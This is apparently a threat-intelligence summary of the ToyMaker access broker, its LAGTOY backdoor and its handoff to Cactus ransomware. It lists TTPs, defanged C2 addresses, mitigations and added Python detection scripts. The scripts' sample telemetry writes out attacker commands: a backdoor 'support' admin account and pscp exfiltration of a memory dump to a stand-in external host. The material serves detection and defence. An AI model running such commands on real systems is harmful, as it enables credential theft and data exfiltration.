Full Report
Cisco Talos reported a compromise of a critical infrastructure enterprise in which the initial access broker ToyMaker deployed its custom LAGTOY backdoor and then handed access to the Cactus ransomware group, which followed up with data theft and ransomware deployment (double extortion).
Analysis Summary
# Threat Actor: ToyMaker
## Attribution & Identity
ToyMaker is identified as an Initial Access Broker (IAB) assessed with medium confidence to be financially motivated. They are known to operate in conjunction with secondary threat actors, specifically observed handing off access to the **Cactus** ransomware group.
## Activity Summary
ToyMaker specializes in gaining initial access to high-value organizations by exploiting vulnerable internet-facing systems. Their primary operation involves a rapid compromise sequence: initial access, reconnaissance, credential extraction, and deployment of a custom backdoor, followed by a lapse in activity before handing access to a secondary group. In the observed incident involving critical infrastructure, ToyMaker provided access to the Cactus ransomware group, who then proceeded with data exfiltration and deployment of ransomware.
## Tactics, Techniques & Procedures
- **Initial Compromise:** Exploiting known vulnerabilities in unpatched internet-facing servers.
- **Reconnaissance:** Performing rapid system and network discovery (`whoami`, `net user`, `ipconfig /all`, `nltest /domain_trusts`).
- **Credential Access:** Dumping system memory with Magnet RAM Capture and extracting credentials from the resulting image. (T1003)
- **Persistence/Backdoor:** Deploying a custom backdoor named **LAGTOY**, which can spawn reverse shells and execute operator-supplied commands on the infected host.
- **Account Manipulation:** Creating a fake local user account ('support') and adding it to local administrator groups. (T1136)
- **Lateral Movement Preparation:** Establishing an SSH listener (`sshd.exe`) and downloading tools via an SFTP connection from another infected host.
- **Data Staging/Exfiltration:** Archiving data using 7za.exe (`7za.exe a`) and exfiltrating files using PuTTY’s SCP utility (`pscp.exe`). (T1048)
- **Tool Usage:** Leveraging dual-use tools like OpenSSH (sshd.exe, sftp-server.exe), PuTTY (pscp), and common forensics tools (Magnet RAM Capture).
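The TTP list above is a sequence of host-observable events (recon burst, `support` account creation, memory dump, `7za.exe a`, `pscp.exe`) that can be correlated per host. The following is an added example written for this page, not code from Talos or from the actors, showing detection logic over constructed process-creation events. The event shape `(host, timestamp, image, cmdline)` is a simplified Sysmon-style record and not any product's real schema; the Magnet RAM Capture file name `MagnetRAMCapture.exe`, the host names, the password and the `203.0.113.10` destination are all assumptions made up for the sample data.

```python
"""Correlate ToyMaker-style host activity over constructed process-creation events."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed file name for the Magnet RAM Capture binary (not confirmed by the page).
MEMORY_CAPTURE_IMAGES = {"magnetramcapture.exe"}

# Regexes run over a normalised command line: exe basename without ".exe", lower-cased.
RECON_RE = re.compile(r"^(whoami|ipconfig /all|net1? user|nltest /domain_trusts)$")
SUPPORT_USER_RE = re.compile(r"^net1? user support \S+ /add")          # T1136
LOCAL_ADMIN_RE = re.compile(r"^net1? localgroup administrators \S+ /add")
ARCHIVE_RE = re.compile(r"^7za? a ")                                     # 7za.exe a ...
SCP_RE = re.compile(r"^pscp ")                                           # T1048 via PuTTY scp


def normalize(cmdline):
    """Lower-case, strip quotes, reduce the first token to its exe basename without '.exe'."""
    parts = cmdline.replace('"', "").split()
    if not parts:
        return ""
    exe = parts[0].rsplit("\\", 1)[-1].lower()
    if exe.endswith(".exe"):
        exe = exe[:-4]
    return " ".join([exe] + [p.lower() for p in parts[1:]])


def classify(image, cmdline):
    """Map one process-creation event to a stage tag from the TTP list, or None."""
    exe = image.rsplit("\\", 1)[-1].lower()
    cmd = normalize(cmdline)
    if exe in MEMORY_CAPTURE_IMAGES:
        return "memory_capture"
    if exe == "sshd.exe":
        return "ssh_listener"
    if SUPPORT_USER_RE.match(cmd) or LOCAL_ADMIN_RE.match(cmd):
        return "account_manipulation"
    if ARCHIVE_RE.match(cmd):
        return "archive_staging"
    if SCP_RE.match(cmd):
        return "scp_exfil"
    if RECON_RE.match(cmd):
        return "recon"
    return None


def analyze(events, burst_min=3, window=timedelta(minutes=5)):
    """Return {host: {"stages": set, "severity": str}} for hosts with at least one stage.

    A lone recon command is noise; 'recon_burst' needs burst_min recon commands
    inside `window`. Severity grows with the number of distinct stages seen.
    """
    per_host = defaultdict(list)
    for host, ts, image, cmdline in events:
        tag = classify(image, cmdline)
        if tag:
            per_host[host].append((datetime.fromisoformat(ts), tag))
    findings = {}
    for host, tagged in per_host.items():
        tagged.sort()
        stages = {tag for _, tag in tagged if tag != "recon"}
        recon_times = [t for t, tag in tagged if tag == "recon"]
        for i in range(len(recon_times) - burst_min + 1):
            if recon_times[i + burst_min - 1] - recon_times[i] <= window:
                stages.add("recon_burst")
                break
        if not stages:
            continue
        severity = "high" if len(stages) >= 3 else "medium" if len(stages) == 2 else "low"
        findings[host] = {"stages": stages, "severity": severity}
    return findings


# Constructed sample telemetry: one host showing the full chain, one showing a benign 7za use.
SAMPLE_EVENTS = [
    ("SRV-WEB01", "2023-06-01T10:00:05", r"C:\Windows\System32\whoami.exe", "whoami"),
    ("SRV-WEB01", "2023-06-01T10:00:09", r"C:\Windows\System32\net.exe", "net user"),
    ("SRV-WEB01", "2023-06-01T10:00:14", r"C:\Windows\System32\ipconfig.exe", "ipconfig /all"),
    ("SRV-WEB01", "2023-06-01T10:00:20", r"C:\Windows\System32\nltest.exe", "nltest /domain_trusts"),
    ("SRV-WEB01", "2023-06-01T10:03:00", r"C:\Windows\System32\net.exe", "net user support Passw0rd! /add"),
    ("SRV-WEB01", "2023-06-01T10:03:05", r"C:\Windows\System32\net.exe", "net localgroup administrators support /add"),
    ("SRV-WEB01", "2023-06-01T10:10:00", r"C:\Users\Public\MagnetRAMCapture.exe", "MagnetRAMCapture.exe"),
    ("SRV-WEB01", "2023-06-01T10:25:00", r"C:\Users\Public\7za.exe", r"7za.exe a -mx9 C:\Users\Public\mem.7z C:\Users\Public\mem.raw"),
    ("SRV-WEB01", "2023-06-01T10:30:00", r"C:\Users\Public\pscp.exe", r"pscp.exe -P 22 C:\Users\Public\mem.7z user@203.0.113.10:/tmp/"),
    ("WS-ADMIN02", "2023-06-01T11:00:00", r"C:\Windows\System32\whoami.exe", "whoami"),
    ("WS-ADMIN02", "2023-06-01T11:30:00", r"C:\Program Files\7-Zip\7za.exe", r"7za.exe a backup.7z C:\Reports"),
]

if __name__ == "__main__":
    for host, finding in analyze(SAMPLE_EVENTS).items():
        print(host, finding["severity"], sorted(finding["stages"]))
```

`SRV-WEB01` hits five stages and is rated high; `WS-ADMIN02` only archived a directory with 7-Zip and stays low, which is where an allowlist of expected archiving hosts would suppress the alert. Each of these tools is dual-use, so the value is in the per-host chaining, not in any single match.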
## Targeting
- **Sectors:** Critical infrastructure.
- **Geography:** The report does not state ToyMaker's origin; the known victim is a critical infrastructure enterprise.
- **Victims:** One critical infrastructure enterprise, compromised in 2023.
## Tools & Infrastructure
- **Malware families used:**
- **LAGTOY** (Custom backdoor)
- Metasploit shells: the report also lists hashes for Metasploit-generated shells, which suggests their use by ToyMaker or overlap with its tooling.
- **Infrastructure (C2 IPs, defanged):**
- **ToyMaker IOCs:**
- 209[.]141[.]43[.]37
- 194[.]156[.]98[.]155
- 158[.]247[.]211[.]51
- 39[.]106[.]141[.]68
- 47[.]117[.]165[.]166
- 195[.]123[.]240[.]2
- 75[.]127[.]0[.]235
- 149[.]102[.]243[.]100
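The IP list above is defanged for safe publication, so it has to be refanged before it can be loaded into a firewall block list or matched against flow logs. The following is an added example written for this page, not code from Talos, that refangs the eight IOCs and runs them against constructed connection-log lines, also flagging outbound SSH to destinations outside the organisation's own ranges (the "unusual SSH connections" the mitigations call out). The log line format, the `10.0.0.0/8`-style internal ranges, the `198.51.100.7` destination and the source hosts are assumptions made up for the example.

```python
"""Refang defanged IOCs and match them against constructed connection logs."""
import ipaddress
import re

# The eight ToyMaker C2 addresses exactly as published (defanged) on this page.
DEFANGED_IOCS = [
    "209[.]141[.]43[.]37", "194[.]156[.]98[.]155", "158[.]247[.]211[.]51",
    "39[.]106[.]141[.]68", "47[.]117[.]165[.]166", "195[.]123[.]240[.]2",
    "75[.]127[.]0[.]235", "149[.]102[.]243[.]100",
]

# Assumed internal address space; adjust to the real estate before use.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed log format: "<ts> src=<ip> dst=<ip> dport=<port> proto=<proto>".
LOG_RE = re.compile(r"^(?P<ts>\S+) src=(?P<src>\S+) dst=(?P<dst>\S+) dport=(?P<dport>\d+) proto=(?P<proto>\w+)$")


def refang(indicator):
    """Undo common defanging: '[.]', '(.)' and '{.}' become '.', 'hxxp' becomes 'http'."""
    s = re.sub(r"\[\.\]|\(\.\)|\{\.\}", ".", indicator.strip())
    return re.sub(r"^hxxp(s?)://", r"http\1://", s, flags=re.IGNORECASE)


def load_ip_iocs(defanged):
    """Refang and validate each entry; a malformed indicator raises ValueError rather than being silently skipped."""
    return {ipaddress.ip_address(refang(d)) for d in defanged}


def is_internal(addr):
    return any(addr in net for net in INTERNAL_NETS)


def scan_connections(lines, iocs):
    """Return (ts, src, dst, dport, reason) for each matching line; unparsable lines are skipped."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        dst = ipaddress.ip_address(m["dst"])
        dport = int(m["dport"])
        if dst in iocs:
            hits.append((m["ts"], m["src"], str(dst), dport, "known_toymaker_ioc"))
        elif dport == 22 and not is_internal(dst):
            hits.append((m["ts"], m["src"], str(dst), dport, "outbound_ssh_to_external"))
    return hits


# Constructed sample flow records.
SAMPLE_LOG = [
    "2023-06-01T10:30:02 src=10.20.30.40 dst=209.141.43.37 dport=22 proto=tcp",     # IOC hit
    "2023-06-01T10:31:10 src=10.20.30.40 dst=198.51.100.7 dport=22 proto=tcp",      # SSH to non-IOC external host
    "2023-06-01T10:32:00 src=10.20.30.40 dst=10.20.30.5 dport=22 proto=tcp",        # internal SSH, ignored
    "2023-06-01T10:33:00 src=10.20.30.41 dst=149.102.243.100 dport=443 proto=tcp",  # IOC hit on 443
    "this line is not a flow record",                                               # skipped
]

if __name__ == "__main__":
    for hit in scan_connections(SAMPLE_LOG, load_ip_iocs(DEFANGED_IOCS)):
        print(*hit)
```

Matching on the exact IOC set is the cheap, high-precision check; the external-SSH rule is the broader one and needs the internal ranges, jump hosts and any sanctioned SFTP destinations allowlisted before it is useful at scale.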
## Implications
ToyMaker is a significant threat as a specialised Initial Access Broker feeding ransomware operations. Its pattern of rapid, limited activity (reconnaissance and credential theft) followed by a handover indicates an interest in monetising the breach rather than in long-term espionage, and its access directly enables destructive follow-on attacks by established ransomware groups such as Cactus.
## Mitigations
- Prioritize patching and aggressively monitoring internet-facing servers to prevent the initial vulnerability exploitation.
- Deploy robust intrusion detection capabilities capable of identifying the tactics used for credential harvesting (e.g., Magnet RAM Capture execution) and file staging/exfiltration (e.g., 7za.exe, pscp.exe).
- Implement strict network monitoring to detect unusual SSH connections or the presence of the custom `LAGTOY` implant.
- Plan for the observed activity pattern: a brief initial-access phase, then a lull that can last weeks, before a secondary and more destructive actor (here, Cactus) uses the stolen credentials; a quiet period after a contained intrusion is not evidence that the access has been closed.